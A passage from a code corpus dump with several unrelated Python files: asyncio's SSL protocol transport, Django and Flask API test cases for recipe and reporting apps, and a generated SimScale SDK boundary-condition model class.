self._ssl_protocol._transport.pause_reading()
def resume_reading(self):
"""Resume the receiving end.
Data received will once again be passed to the protocol's
data_received() method.
"""
self._ssl_protocol._transport.resume_reading()
def set_write_buffer_limits(self, high=None, low=None):
"""Set the high- and low-water limits for write flow control.
These two values control when to call the protocol's
pause_writing() and resume_writing() methods. If specified,
the low-water limit must be less than or equal to the
high-water limit. Neither value can be negative.
The defaults are implementation-specific. If only the
high-water limit is given, the low-water limit defaults to an
implementation-specific value less than or equal to the
high-water limit. Setting high to zero forces low to zero as
well, and causes pause_writing() to be called whenever the
buffer becomes non-empty. Setting low to zero causes
resume_writing() to be called only once the buffer is empty.
Use of zero for either limit is generally sub-optimal as it
reduces opportunities for doing I/O and computation
concurrently.
"""
self._ssl_protocol._transport.set_write_buffer_limits(high, low)
def get_write_buffer_size(self):
"""Return the current size of the write buffer."""
return self._ssl_protocol._transport.get_write_buffer_size()
@property
def _protocol_paused(self):
# Required for sendfile fallback pause_writing/resume_writing logic
return self._ssl_protocol._transport._protocol_paused
def write(self, data):
"""Write some data bytes to the transport.
This does not block; it buffers the data and arranges for it
to be sent out asynchronously.
"""
if not isinstance(data, (bytes, bytearray, memoryview)):
raise TypeError(f"data: expecting a bytes-like instance, "
f"got {type(data).__name__}")
if not data:
return
self._ssl_protocol._write_appdata(data)
def can_write_eof(self):
"""Return True if this transport supports write_eof(), False if not."""
return False
def abort(self):
"""Close the transport immediately.
Buffered data will be lost. No more data will be received.
The protocol's connection_lost() method will (eventually) be
called with None as its argument.
"""
self._ssl_protocol._abort()
self._closed = True
class SSLProtocol(protocols.Protocol):
"""SSL protocol.
Implementation of SSL on top of a socket using incoming and outgoing
buffers which are ssl.MemoryBIO objects.
"""
def __init__(self, loop, app_protocol, sslcontext, waiter,
server_side=False, server_hostname=None,
call_connection_made=True,
ssl_handshake_timeout=None):
if ssl is None:
raise RuntimeError('stdlib ssl module not available')
if ssl_handshake_timeout is None:
ssl_handshake_timeout = constants.SSL_HANDSHAKE_TIMEOUT
elif ssl_handshake_timeout <= 0:
raise ValueError(
f"ssl_handshake_timeout should be a positive number, "
f"got {ssl_handshake_timeout}")
if not sslcontext:
sslcontext = _create_transport_context(
server_side, server_hostname)
self._server_side = server_side
if server_hostname and not server_side:
self._server_hostname = server_hostname
else:
self._server_hostname = None
self._sslcontext = sslcontext
# SSL-specific extra info. More info are set when the handshake
# completes.
self._extra = dict(sslcontext=sslcontext)
# App data write buffering
self._write_backlog = collections.deque()
self._write_buffer_size = 0
self._waiter = waiter
self._loop = loop
self._set_app_protocol(app_protocol)
self._app_transport = _SSLProtocolTransport(self._loop, self)
# _SSLPipe instance (None until the connection is made)
self._sslpipe = None
self._session_established = False
self._in_handshake = False
self._in_shutdown = False
# transport, ex: SelectorSocketTransport
self._transport = None
self._call_connection_made = call_connection_made
self._ssl_handshake_timeout = ssl_handshake_timeout
def _set_app_protocol(self, app_protocol):
self._app_protocol = app_protocol
self._app_protocol_is_buffer = \
isinstance(app_protocol, protocols.BufferedProtocol)
def _wakeup_waiter(self, exc=None):
if self._waiter is None:
return
if not self._waiter.cancelled():
if exc is not None:
self._waiter.set_exception(exc)
else:
self._waiter.set_result(None)
self._waiter = None
def connection_made(self, transport):
"""Called when the low-level connection is made.
Start the SSL handshake.
"""
self._transport = transport
self._sslpipe = _SSLPipe(self._sslcontext,
self._server_side,
self._server_hostname)
self._start_handshake()
def connection_lost(self, exc):
"""Called when the low-level connection is lost or closed.
The argument is an exception object or None (the latter
meaning a regular EOF is received or the connection was
aborted or closed).
"""
if self._session_established:
self._session_established = False
self._loop.call_soon(self._app_protocol.connection_lost, exc)
else:
# Most likely an exception occurred while in SSL handshake.
# Just mark the app transport as closed so that its __del__
# doesn't complain.
if self._app_transport is not None:
self._app_transport._closed = True
self._transport = None
self._app_transport = None
if getattr(self, '_handshake_timeout_handle', None):
self._handshake_timeout_handle.cancel()
self._wakeup_waiter(exc)
self._app_protocol = None
self._sslpipe = None
def pause_writing(self):
"""Called when the low-level transport's buffer goes over
the high-water mark.
"""
self._app_protocol.pause_writing()
def resume_writing(self):
"""Called when the low-level transport's buffer drains below
the low-water mark.
"""
self._app_protocol.resume_writing()
def data_received(self, data):
"""Called when some SSL data is received.
The argument is a bytes object.
"""
if self._sslpipe is None:
# transport closing, sslpipe is destroyed
return
try:
ssldata, appdata = self._sslpipe.feed_ssldata(data)
except Exception as e:
self._fatal_error(e, 'SSL error in data received')
return
for chunk in ssldata:
self._transport.write(chunk)
for chunk in appdata:
if chunk:
try:
if self._app_protocol_is_buffer:
protocols._feed_data_to_buffered_proto(
self._app_protocol, chunk)
else:
self._app_protocol.data_received(chunk)
except Exception as ex:
self._fatal_error(
ex, 'application protocol failed to receive SSL data')
return
else:
self._start_shutdown()
break
def eof_received(self):
"""Called when the other end of the low-level stream
is half-closed.
If this returns a false value (including None), the transport
will close itself. If it returns a true value, closing the
transport is up to the protocol.
"""
try:
if self._loop.get_debug():
logger.debug("%r received EOF", self)
self._wakeup_waiter(ConnectionResetError)
if not self._in_handshake:
keep_open = self._app_protocol.eof_received()
if keep_open:
logger.warning('returning true from eof_received() '
'has no effect when using ssl')
finally:
self._transport.close()
def _get_extra_info(self, name, default=None):
if name in self._extra:
return self._extra[name]
elif self._transport is not None:
return self._transport.get_extra_info(name, default)
else:
return default
def _start_shutdown(self):
if self._in_shutdown:
return
if self._in_handshake:
self._abort()
else:
self._in_shutdown = True
self._write_appdata(b'')
def _write_appdata(self, data):
self._write_backlog.append((data, 0))
self._write_buffer_size += len(data)
self._process_write_backlog()
def _start_handshake(self):
if self._loop.get_debug():
logger.debug("%r starts SSL handshake", self)
self._handshake_start_time = self._loop.time()
else:
self._handshake_start_time = None
self._in_handshake = True
# (b'', 1) is a special value in _process_write_backlog() to do
# the SSL handshake
self._write_backlog.append((b'', 1))
self._handshake_timeout_handle = \
self._loop.call_later(self._ssl_handshake_timeout,
self._check_handshake_timeout)
self._process_write_backlog()
def _check_handshake_timeout(self):
if self._in_handshake is True:
msg = (
f"SSL handshake is taking longer than "
f"{self._ssl_handshake_timeout} seconds: "
f"aborting the connection"
)
self._fatal_error(ConnectionAbortedError(msg))
def _on_handshake_complete(self, handshake_exc):
self._in_handshake = False
self._handshake_timeout_handle.cancel()
sslobj = self._sslpipe.ssl_object
try:
if handshake_exc is not None:
raise handshake_exc
peercert = sslobj.getpeercert()
except Exception as exc:
if isinstance(exc, ssl.CertificateError):
msg = 'SSL handshake failed on verifying the certificate'
else:
msg = 'SSL handshake failed'
self._fatal_error(exc, msg)
return
if self._loop.get_debug():
dt = self._loop.time() - self._handshake_start_time
logger.debug("%r: SSL handshake took %.1f ms", self, dt * 1e3)
# Add extra info that becomes available after handshake.
self._extra.update(peercert=peercert,
cipher=sslobj.cipher(),
compression=sslobj.compression(),
ssl_object=sslobj,
)
if self._call_connection_made:
self._app_protocol.connection_made(self._app_transport)
self._wakeup_waiter()
self._session_established = True
# In case transport.write() was already called. Don't call
# immediately _process_write_backlog(), but schedule it:
# _on_handshake_complete() can be called indirectly from
# _process_write_backlog(), and _process_write_backlog() is not
# reentrant.
self._loop.call_soon(self._process_write_backlog)
def _process_write_backlog(self):
# Try to make progress on the write backlog.
if self._transport is None or self._sslpipe is None:
return
try:
for i in range(len(self._write_backlog)):
data, offset = self._write_backlog[0]
if data:
ssldata, offset = self._sslpipe.feed_appdata(data, offset)
elif offset:
ssldata = self._sslpipe.do_handshake(
self._on_handshake_complete)
offset = 1
else:
ssldata = self._sslpipe.shutdown(self._finalize)
offset = 1
for chunk in ssldata:
self._transport.write(chunk)
if offset < len(data):
self._write_backlog[0] = (data, offset)
# A short write means that a write is blocked on a read
# We need to enable reading if it is paused!
assert self._sslpipe.need_ssldata
if self._transport._paused:
self._transport.resume_reading()
break
# An entire chunk from the backlog was processed. We can
# delete it and reduce the outstanding buffer size.
del self._write_backlog[0]
self._write_buffer_size -= len(data)
except Exception as exc:
if self._in_handshake:
# Exceptions will be re-raised in _on_handshake_complete.
self._on_handshake_complete(exc)
else:
self._fatal_error(exc, 'Fatal error on SSL transport')
def _fatal_error(self, exc, message='Fatal error on transport'):
if isinstance(exc, base_events._FATAL_ERROR_IGNORE):
if self._loop.get_debug():
logger.debug("%r: %s", self, message, exc_info=True)
else:
self._loop.call_exception_handler({
'message': message,
'exception': exc,
'transport': self._transport,
'protocol': self,
})
if self._transport:
self._transport._force_close(exc)
def _finalize(self):
self._sslpipe = None
if self._transport is not None:
self._transport.close()
def _abort(self):
try:
if self._transport is not None:
self._transport.abort()
finally:
self._finalize()
| 37.020604 | 79 | 0.605655 |
9ef5d4d677a7cf87dc6f0834054c7817f861e9d1 | 4,380 | py | Python | app/recipe/tests/tests_ingredient_api.py | momchilantonov/recipe_app_api | 5fe15fa184f464a677f65d45d33d8241c627b432 | [
"MIT"
] | null | null | null | app/recipe/tests/tests_ingredient_api.py | momchilantonov/recipe_app_api | 5fe15fa184f464a677f65d45d33d8241c627b432 | [
"MIT"
] | null | null | null | app/recipe/tests/tests_ingredient_api.py | momchilantonov/recipe_app_api | 5fe15fa184f464a677f65d45d33d8241c627b432 | [
"MIT"
] | null | null | null | from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Ingredient, Recipe
from recipe.serializers import IngredientSerializer
INGREDIENTS_URL = reverse('recipe:ingredient-list')
class PublicIngredientsApiTests(TestCase):
"""Test the publicly available ingredients API"""
def setUp(self):
self.client = APIClient()
def test_loggin_required(self):
"""Test the loggin is required to access the endpoint"""
res = self.client.get(INGREDIENTS_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivetIngredientsApiTests(TestCase):
"""Test ingredients can be retrieved by authorized user"""
def setUp(self):
self.client = APIClient()
self.user = get_user_model().objects.create_user(
email='user@user.com',
password='userPass'
)
self.client.force_authenticate(self.user)
def test_retrieve_ingerdients_list(self):
"""Test retrieving a list of ingredients"""
Ingredient.objects.create(user=self.user, name='Kale')
Ingredient.objects.create(user=self.user, name='Salt')
res = self.client.get(INGREDIENTS_URL)
ingredients = Ingredient.objects.all().order_by('-name')
serializer = IngredientSerializer(ingredients, many=True)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, serializer.data)
def ingredients_limited_to_user(self):
"""Test that ingredients for the authorized user are returned"""
user2 = get_user_model().objects.create_user(
email='user2@user2.com',
password='user2Pass'
)
Ingredient.objects.create(user=user2, name='Vinegar')
ingredient = Ingredient.objects.create(user=self.user, name='Tumeric')
res = self.client.get(INGREDIENTS_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(len(res.data), 1)
self.assertEqual(res.date[0]['name'], ingredient.name)
def test_create_ingredient_successful(self):
"""Tet create a new ingredient successful"""
payload = {'name': 'Cabbage'}
self.client.post(INGREDIENTS_URL, payload)
exist = Ingredient.objects.filter(
user=self.user,
name=payload['name']
).exists()
self.assertTrue(exist)
def test_create_ingredient_invalid(self):
"""Test creating invalid ingredient fails"""
payload = {'name': ''}
res = self.client.post(INGREDIENTS_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_retrieve_ingredients_assigned_to_recipes(self):
"""Test filtering ingredients by those assigned to recipes"""
ingredient1 = Ingredient.objects.create(user=self.user, name='Eggs')
ingredient2 = Ingredient.objects.create(user=self.user, name='Milk')
recipe = Recipe.objects.create(
title='Eggs with Milk',
time_minutes=8,
price=6.00,
user=self.user
)
recipe.ingredients.add(ingredient1)
res = self.client.get(INGREDIENTS_URL, {'assigned_only': 1})
serializer1 = IngredientSerializer(ingredient1)
serializer2 = IngredientSerializer(ingredient2)
self.assertIn(serializer1.data, res.data)
self.assertNotIn(serializer2.data, res.data)
def test_rtest_retrieve_ingredients_assigned_unique(self):
"""Test filtering ingredients by assigned returns unique items"""
ingredient = Ingredient.objects.create(user=self.user, name='Eggs')
Ingredient.objects.create(user=self.user, name='Milk')
recipe1 = Recipe.objects.create(
title='Eggs with Milk',
time_minutes=8,
price=6.00,
user=self.user
)
recipe1.ingredients.add(ingredient)
recipe2 = Recipe.objects.create(
title='Porridge',
time_minutes=3,
price=5.00,
user=self.user
)
recipe2.ingredients.add(ingredient)
res = self.client.get(INGREDIENTS_URL, {'assigned_only': 1})
self.assertEqual(len(res.data), 1)
| 36.806723 | 78 | 0.66484 |
32194989518a3401f14cf907b8beb81db996805c | 1,346 | py | Python | app-test.py | webbyfox/suade | 52a93df0f4cb1f6442b6c7dd259c8350a7687082 | [
"MIT"
] | null | null | null | app-test.py | webbyfox/suade | 52a93df0f4cb1f6442b6c7dd259c8350a7687082 | [
"MIT"
] | null | null | null | app-test.py | webbyfox/suade | 52a93df0f4cb1f6442b6c7dd259c8350a7687082 | [
"MIT"
] | null | null | null | from app import app
import unittest
class BasicTestCase(unittest.TestCase):
def test_index(self):
tester = app.test_client(self)
response = tester.get('/', content_type='html/text')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data, b'Welcome to Suade Reporting API!')
def test_reports(self):
tester = app.test_client(self)
response = tester.get('/api/reports/', content_type='html/text')
self.assertEqual(response.status_code, 200)
# self.assertEqual(response.data, b'Welcome to Suade Reporting API!')
def test_xml_report(self):
tester = app.test_client(self)
response = tester.get('/api/report/1.xml/', content_type='html/text')
self.assertIsNotNone(response)
self.assertEqual(response.status_code, 200)
def test_pdf_report(self):
tester = app.test_client(self)
response = tester.get('/api/report/1.pdf/', content_type='html/text')
self.assertIsNotNone(response)
self.assertEqual(response.status_code, 200)
def test_dummy_url(self):
tester = app.test_client(self)
response = tester.get('/api/report/xyz', content_type='html/text')
self.assertEqual(response.status_code, 404)
if __name__ == '__main__':
unittest.main() | 34.512821 | 77 | 0.664933 |
2293aae1c740cfcd9eee5978496fad92d91ae67b | 30,196 | py | Python | simscale_sdk/models/one_of_convective_heat_transfer_boundary_conditions.py | slainesimscale/simscale-python-sdk | db483eeabe558e55d020f5f829a3bf13c9c287a7 | [
"MIT"
] | null | null | null | simscale_sdk/models/one_of_convective_heat_transfer_boundary_conditions.py | slainesimscale/simscale-python-sdk | db483eeabe558e55d020f5f829a3bf13c9c287a7 | [
"MIT"
] | null | null | null | simscale_sdk/models/one_of_convective_heat_transfer_boundary_conditions.py | slainesimscale/simscale-python-sdk | db483eeabe558e55d020f5f829a3bf13c9c287a7 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
SimScale API
The version of the OpenAPI document: 0.0.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from simscale_sdk.configuration import Configuration
class OneOfConvectiveHeatTransferBoundaryConditions(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'type': 'str',
'name': 'str',
'velocity': 'OneOfCustomFluidBCVelocity',
'temperature': 'AmbientTBC',
'passive_scalars': 'list[OneOfCustomFluidBCPassiveScalars]',
'phase_fraction': 'OneOfCustomFluidBCPhaseFraction',
'turbulence_intensity': 'OneOfVelocityInletBCTurbulenceIntensity',
'dissipation_type': 'OneOfVelocityInletBCDissipationType',
'net_radiative_heat_flux': 'OneOfNaturalConvectionInletOutletBCNetRadiativeHeatFlux',
'radiative_intensity_ray': 'OpenBoundaryRayBC',
'topological_reference': 'TopologicalReference',
'pressure': 'OneOfCustomFluidBCPressure',
'pressure_rgh': 'AmbientPBC',
'gauge_pressure': 'OneOfCustomFluidBCGaugePressure',
'gauge_pressure_rgh': 'OneOfCustomFluidBCGaugePressureRgh',
'turbulent_kinetic_energy': 'OneOfCustomFluidBCTurbulentKineticEnergy',
'omega_dissipation_rate': 'OneOfCustomFluidBCOmegaDissipationRate',
'epsilon_dissipation_rate': 'OneOfCustomFluidBCEpsilonDissipationRate',
'eddy_viscosity': 'OneOfCustomFluidBCEddyViscosity',
'eddy_viscosity_compressible': 'OneOfCustomFluidBCEddyViscosityCompressible',
'nu_tilda': 'OneOfCustomFluidBCNuTilda',
'turbulent_thermal_diffusivity': 'OneOfCustomFluidBCTurbulentThermalDiffusivity',
'turbulent_thermal_diffusivity_compressible': 'OneOfCustomFluidBCTurbulentThermalDiffusivityCompressible',
'turbulent_dynamic_viscosity': 'OneOfCustomFluidBCTurbulentDynamicViscosity'
}
attribute_map = {
'type': 'type',
'name': 'name',
'velocity': 'velocity',
'temperature': 'temperature',
'passive_scalars': 'passiveScalars',
'phase_fraction': 'phaseFraction',
'turbulence_intensity': 'turbulenceIntensity',
'dissipation_type': 'dissipationType',
'net_radiative_heat_flux': 'netRadiativeHeatFlux',
'radiative_intensity_ray': 'radiativeIntensityRay',
'topological_reference': 'topologicalReference',
'pressure': 'pressure',
'pressure_rgh': 'pressureRgh',
'gauge_pressure': 'gaugePressure',
'gauge_pressure_rgh': 'gaugePressureRgh',
'turbulent_kinetic_energy': 'turbulentKineticEnergy',
'omega_dissipation_rate': 'omegaDissipationRate',
'epsilon_dissipation_rate': 'epsilonDissipationRate',
'eddy_viscosity': 'eddyViscosity',
'eddy_viscosity_compressible': 'eddyViscosityCompressible',
'nu_tilda': 'nuTilda',
'turbulent_thermal_diffusivity': 'turbulentThermalDiffusivity',
'turbulent_thermal_diffusivity_compressible': 'turbulentThermalDiffusivityCompressible',
'turbulent_dynamic_viscosity': 'turbulentDynamicViscosity'
}
discriminator_value_class_map = {
'VELOCITY_INLET_V3': 'VelocityInletBC',
'VELOCITY_OUTLET_V7': 'VelocityOutletBC',
'PRESSURE_INLET_V31': 'PressureInletBC',
'PRESSURE_OUTLET_V30': 'PressureOutletBC',
'WALL_V34': 'WallBC',
'SYMMETRY': 'SymmetryBC',
'PERIODIC': 'PeriodicBC',
'WEDGE': 'WedgeBC',
'CUSTOM_V37': 'CustomFluidBC',
'EMPTY_2D': 'Empty2DBC',
'NATURAL_CONVECTION_INLET_OUTLET': 'NaturalConvectionInletOutletBC'
}
def __init__(self, type='NATURAL_CONVECTION_INLET_OUTLET', name=None, velocity=None, temperature=None, passive_scalars=None, phase_fraction=None, turbulence_intensity=None, dissipation_type=None, net_radiative_heat_flux=None, radiative_intensity_ray=None, topological_reference=None, pressure=None, pressure_rgh=None, gauge_pressure=None, gauge_pressure_rgh=None, turbulent_kinetic_energy=None, omega_dissipation_rate=None, epsilon_dissipation_rate=None, eddy_viscosity=None, eddy_viscosity_compressible=None, nu_tilda=None, turbulent_thermal_diffusivity=None, turbulent_thermal_diffusivity_compressible=None, turbulent_dynamic_viscosity=None, local_vars_configuration=None): # noqa: E501
"""OneOfConvectiveHeatTransferBoundaryConditions - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._type = None
self._name = None
self._velocity = None
self._temperature = None
self._passive_scalars = None
self._phase_fraction = None
self._turbulence_intensity = None
self._dissipation_type = None
self._net_radiative_heat_flux = None
self._radiative_intensity_ray = None
self._topological_reference = None
self._pressure = None
self._pressure_rgh = None
self._gauge_pressure = None
self._gauge_pressure_rgh = None
self._turbulent_kinetic_energy = None
self._omega_dissipation_rate = None
self._epsilon_dissipation_rate = None
self._eddy_viscosity = None
self._eddy_viscosity_compressible = None
self._nu_tilda = None
self._turbulent_thermal_diffusivity = None
self._turbulent_thermal_diffusivity_compressible = None
self._turbulent_dynamic_viscosity = None
self.discriminator = 'type'
self.type = type
if name is not None:
self.name = name
if velocity is not None:
self.velocity = velocity
if temperature is not None:
self.temperature = temperature
if passive_scalars is not None:
self.passive_scalars = passive_scalars
if phase_fraction is not None:
self.phase_fraction = phase_fraction
if turbulence_intensity is not None:
self.turbulence_intensity = turbulence_intensity
if dissipation_type is not None:
self.dissipation_type = dissipation_type
if net_radiative_heat_flux is not None:
self.net_radiative_heat_flux = net_radiative_heat_flux
if radiative_intensity_ray is not None:
self.radiative_intensity_ray = radiative_intensity_ray
if topological_reference is not None:
self.topological_reference = topological_reference
if pressure is not None:
self.pressure = pressure
if pressure_rgh is not None:
self.pressure_rgh = pressure_rgh
if gauge_pressure is not None:
self.gauge_pressure = gauge_pressure
if gauge_pressure_rgh is not None:
self.gauge_pressure_rgh = gauge_pressure_rgh
if turbulent_kinetic_energy is not None:
self.turbulent_kinetic_energy = turbulent_kinetic_energy
if omega_dissipation_rate is not None:
self.omega_dissipation_rate = omega_dissipation_rate
if epsilon_dissipation_rate is not None:
self.epsilon_dissipation_rate = epsilon_dissipation_rate
if eddy_viscosity is not None:
self.eddy_viscosity = eddy_viscosity
if eddy_viscosity_compressible is not None:
self.eddy_viscosity_compressible = eddy_viscosity_compressible
if nu_tilda is not None:
self.nu_tilda = nu_tilda
if turbulent_thermal_diffusivity is not None:
self.turbulent_thermal_diffusivity = turbulent_thermal_diffusivity
if turbulent_thermal_diffusivity_compressible is not None:
self.turbulent_thermal_diffusivity_compressible = turbulent_thermal_diffusivity_compressible
if turbulent_dynamic_viscosity is not None:
self.turbulent_dynamic_viscosity = turbulent_dynamic_viscosity
@property
def type(self):
"""Gets the type of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
<p>This boundary condition is suitable for an <b>open boundary</b> where the air can enter or exit freely from or to the <b>atmosphere<b>. <a href='https://www.simscale.com/docs/simulation-setup/boundary-conditions/natural-convection-inlet-outlet/' target='_blank'>Learn more</a>.</P> Schema name: NaturalConvectionInletOutletBC # noqa: E501
:return: The type of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this OneOfConvectiveHeatTransferBoundaryConditions.
<p>This boundary condition is suitable for an <b>open boundary</b> where the air can enter or exit freely from or to the <b>atmosphere<b>. <a href='https://www.simscale.com/docs/simulation-setup/boundary-conditions/natural-convection-inlet-outlet/' target='_blank'>Learn more</a>.</P> Schema name: NaturalConvectionInletOutletBC # noqa: E501
:param type: The type of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and type is None: # noqa: E501
raise ValueError("Invalid value for `type`, must not be `None`") # noqa: E501
self._type = type
@property
def name(self):
"""Gets the name of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:return: The name of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this OneOfConvectiveHeatTransferBoundaryConditions.
:param name: The name of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: str
"""
self._name = name
@property
def velocity(self):
"""Gets the velocity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:return: The velocity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: OneOfCustomFluidBCVelocity
"""
return self._velocity
@velocity.setter
def velocity(self, velocity):
"""Sets the velocity of this OneOfConvectiveHeatTransferBoundaryConditions.
:param velocity: The velocity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: OneOfCustomFluidBCVelocity
"""
self._velocity = velocity
@property
def temperature(self):
"""Gets the temperature of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:return: The temperature of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: AmbientTBC
"""
return self._temperature
@temperature.setter
def temperature(self, temperature):
"""Sets the temperature of this OneOfConvectiveHeatTransferBoundaryConditions.
:param temperature: The temperature of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: AmbientTBC
"""
self._temperature = temperature
@property
def passive_scalars(self):
"""Gets the passive_scalars of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
Please choose a boundary condition for passive scalar (T). # noqa: E501
:return: The passive_scalars of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: list[OneOfCustomFluidBCPassiveScalars]
"""
return self._passive_scalars
@passive_scalars.setter
def passive_scalars(self, passive_scalars):
"""Sets the passive_scalars of this OneOfConvectiveHeatTransferBoundaryConditions.
Please choose a boundary condition for passive scalar (T). # noqa: E501
:param passive_scalars: The passive_scalars of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: list[OneOfCustomFluidBCPassiveScalars]
"""
self._passive_scalars = passive_scalars
@property
def phase_fraction(self):
"""Gets the phase_fraction of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:return: The phase_fraction of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: OneOfCustomFluidBCPhaseFraction
"""
return self._phase_fraction
@phase_fraction.setter
def phase_fraction(self, phase_fraction):
"""Sets the phase_fraction of this OneOfConvectiveHeatTransferBoundaryConditions.
:param phase_fraction: The phase_fraction of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: OneOfCustomFluidBCPhaseFraction
"""
self._phase_fraction = phase_fraction
@property
def turbulence_intensity(self):
"""Gets the turbulence_intensity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:return: The turbulence_intensity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: OneOfVelocityInletBCTurbulenceIntensity
"""
return self._turbulence_intensity
@turbulence_intensity.setter
def turbulence_intensity(self, turbulence_intensity):
"""Sets the turbulence_intensity of this OneOfConvectiveHeatTransferBoundaryConditions.
:param turbulence_intensity: The turbulence_intensity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: OneOfVelocityInletBCTurbulenceIntensity
"""
self._turbulence_intensity = turbulence_intensity
@property
def dissipation_type(self):
"""Gets the dissipation_type of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:return: The dissipation_type of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: OneOfVelocityInletBCDissipationType
"""
return self._dissipation_type
@dissipation_type.setter
def dissipation_type(self, dissipation_type):
"""Sets the dissipation_type of this OneOfConvectiveHeatTransferBoundaryConditions.
:param dissipation_type: The dissipation_type of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: OneOfVelocityInletBCDissipationType
"""
self._dissipation_type = dissipation_type
@property
def net_radiative_heat_flux(self):
"""Gets the net_radiative_heat_flux of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:return: The net_radiative_heat_flux of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: OneOfNaturalConvectionInletOutletBCNetRadiativeHeatFlux
"""
return self._net_radiative_heat_flux
@net_radiative_heat_flux.setter
def net_radiative_heat_flux(self, net_radiative_heat_flux):
"""Sets the net_radiative_heat_flux of this OneOfConvectiveHeatTransferBoundaryConditions.
:param net_radiative_heat_flux: The net_radiative_heat_flux of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: OneOfNaturalConvectionInletOutletBCNetRadiativeHeatFlux
"""
self._net_radiative_heat_flux = net_radiative_heat_flux
@property
def radiative_intensity_ray(self):
"""Gets the radiative_intensity_ray of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:return: The radiative_intensity_ray of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: OpenBoundaryRayBC
"""
return self._radiative_intensity_ray
@radiative_intensity_ray.setter
def radiative_intensity_ray(self, radiative_intensity_ray):
"""Sets the radiative_intensity_ray of this OneOfConvectiveHeatTransferBoundaryConditions.
:param radiative_intensity_ray: The radiative_intensity_ray of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: OpenBoundaryRayBC
"""
self._radiative_intensity_ray = radiative_intensity_ray
@property
def topological_reference(self):
"""Gets the topological_reference of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:return: The topological_reference of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: TopologicalReference
"""
return self._topological_reference
@topological_reference.setter
def topological_reference(self, topological_reference):
"""Sets the topological_reference of this OneOfConvectiveHeatTransferBoundaryConditions.
:param topological_reference: The topological_reference of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: TopologicalReference
"""
self._topological_reference = topological_reference
@property
def pressure(self):
"""Gets the pressure of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:return: The pressure of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: OneOfCustomFluidBCPressure
"""
return self._pressure
@pressure.setter
def pressure(self, pressure):
"""Sets the pressure of this OneOfConvectiveHeatTransferBoundaryConditions.
:param pressure: The pressure of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: OneOfCustomFluidBCPressure
"""
self._pressure = pressure
@property
def pressure_rgh(self):
"""Gets the pressure_rgh of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:return: The pressure_rgh of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: AmbientPBC
"""
return self._pressure_rgh
@pressure_rgh.setter
def pressure_rgh(self, pressure_rgh):
"""Sets the pressure_rgh of this OneOfConvectiveHeatTransferBoundaryConditions.
:param pressure_rgh: The pressure_rgh of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: AmbientPBC
"""
self._pressure_rgh = pressure_rgh
@property
def gauge_pressure(self):
"""Gets the gauge_pressure of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:return: The gauge_pressure of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: OneOfCustomFluidBCGaugePressure
"""
return self._gauge_pressure
@gauge_pressure.setter
def gauge_pressure(self, gauge_pressure):
"""Sets the gauge_pressure of this OneOfConvectiveHeatTransferBoundaryConditions.
